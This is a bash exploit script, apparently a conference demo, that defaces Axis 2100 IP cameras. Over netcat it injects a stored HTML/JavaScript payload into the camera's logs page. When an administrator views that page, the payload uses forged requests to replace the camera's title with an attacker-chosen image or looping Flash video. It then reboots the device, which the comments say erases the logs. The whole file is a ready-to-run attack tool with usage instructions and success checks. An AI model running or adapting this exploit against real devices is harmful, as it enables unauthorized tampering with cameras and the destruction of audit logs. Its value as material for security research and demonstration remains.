#!/bin/bash

# axis-defacer.sh - demo defacer written for HITB Dubai 2008
# by Adrian 'pagvac' Pastor of GNUCITIZEN (www.gnucitizen.org)
# 
# requirements: bash + netcat
#
# tested on Axis 2100 Network Camera - Firmware version 2.43
#
# Note: logs are always deleted by restarting the device after payload
# is triggerd when admin views logs page. This is done by CSRFing
# the 'reboot' request

# TODO:
# Avoid '&' in 3rd parameter breaking injected HTML
# include functionlity to request 3rd party notification php script

if [[ $# -ne 1 && $# -ne 3 ]]
then
	echo "Axis IP camera defacer by pagvac at GNUCITIZEN";
	echo "usage: $0 <target-ip> [defacement-type] [resource-url]";
	echo "defacement types:";
	echo -e "\t1 - animated gif / static image";
	echo -e "\t2 - never-ending flash video";
	echo "examples:";
	echo -e "\t$0 192.168.0.100";
	echo -e "\t$0 192.168.0.100 2 \"http://www.youtube.com/v/Pb2dwtZ2gRw%26rel=1\"";
	echo "warning! in order to avoid breaking injected HTML remember to:";
	echo -e "\t- replace & with with hex code (%26) in URLs";
	echo -e "\t- enclose URLs with quotation marks";
	exit;
fi

SUCCMSG="malicious HTML/JS payload successfully submitted.\n"\
"if target Axis camera is vulnerable, payload should be injected in the logs page";

UNSUCCMSG="something went wrong.\n"\
"lack of connectivity with target camera?";

# demo defacement with defcon skull
REQ0='"</TEXTAREA></FORM><script>imgObj=new Image();'\
'imgObj.src="/this_server/ServerManager.srv?conf_Layout_LayoutEnabled=yes&Layout_LayoutEnabled=on&conf_Layout_TitleEnabled=yes'\
'&Layout_TitleEnabled=on&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle='\
'<img src=http://snipu.com/f1><!--&servermanager_do=set_variables";'\
'imgObj2=new Image();'\
'function foo(){imgObj2.src="/this_server/ServerManager.srv?do_reboot='\
'yes&do_factory_default=no&servermanager_return_page='\
'%2Fadmin%2Fsup_restart.shtml&servermanager_do=set_variables"};'\
'imgObj.onload=foo()'\
'</script>'\
'<!--\nConnection: close\r\n\r\n';

# 1 - animated gif / static image
REQ1='"</TEXTAREA></FORM><script>imgObj=new Image();'\
'imgObj.src="/this_server/ServerManager.srv?conf_Layout_LayoutEnabled=yes&Layout_LayoutEnabled=on&conf_Layout_TitleEnabled=yes'\
'&Layout_TitleEnabled=on&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle='\
'<img src='$3'><!--&servermanager_do=set_variables";'\
'imgObj2=new Image();'\
'function foo(){imgObj2.src="/this_server/ServerManager.srv?do_reboot='\
'yes&do_factory_default=no&servermanager_return_page='\
'%2Fadmin%2Fsup_restart.shtml&servermanager_do=set_variables"};'\
'imgObj.onload=foo()'\
'</script>'\
'<!--\nConnection: close\r\n\r\n';


# not working properly
# 2 - never-ending flash video
REQ2='"</TEXTAREA></FORM><script>imgObj=new Image();'\
'imgObj.src="/this_server/ServerManager.srv?conf_Layout_LayoutEnabled=yes&Layout_LayoutEnabled=on&conf_Layout_TitleEnabled=yes'\
'&Layout_TitleEnabled=on&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle='\
'<object width=640 height=480><param name=movie value='$3'><param name=play value=true>'\
'<param name=LOOP value=true><embed src='$3' width=640 height=480 play=true loop=true>'\
'</embed></object><!--'\
'&servermanager_do=set_variables";'\
'imgObj2=new Image();'\
'function foo(){imgObj2.src="/this_server/ServerManager.srv?do_reboot='\
'yes&do_factory_default=no&servermanager_return_page='\
'%2Fadmin%2Fsup_restart.shtml&servermanager_do=set_variables"};'\
'imgObj.onload=foo()'\
'</script>'\
'<!--\nConnection: close\r\n\r\n'; 


# demo mode
if [[ $# -eq 1 ]]
then
	if echo -en $REQ0 | nc -w5 -n $1 80 | grep 'Bad Request' > /dev/null
	then 
		echo -e $SUCCMSG;
        else
                echo -en $UNSUCCMSG
	fi	

elif [[ $# -eq 3 ]]
then
# 1 - animated gif / static image	
if [[ $2 -eq 1 ]]
then
	if echo -en $REQ1 | nc -w5 -n $1 80 | grep 'Bad Request' > /dev/null
        then
               	echo -e $SUCCMSG;
       	else
		echo -en $UNSUCCMSG 
	fi
fi	

# 2 - never-ending flash video
if [[ $2 -eq 2 ]]
then
	if echo -en $REQ2 | nc -w5 -n $1 80 | grep 'Bad Request' > /dev/null
       	then
        	echo -e $SUCCMSG;
      	else
                echo -en $UNSUCCMSG
	fi
fi

fi
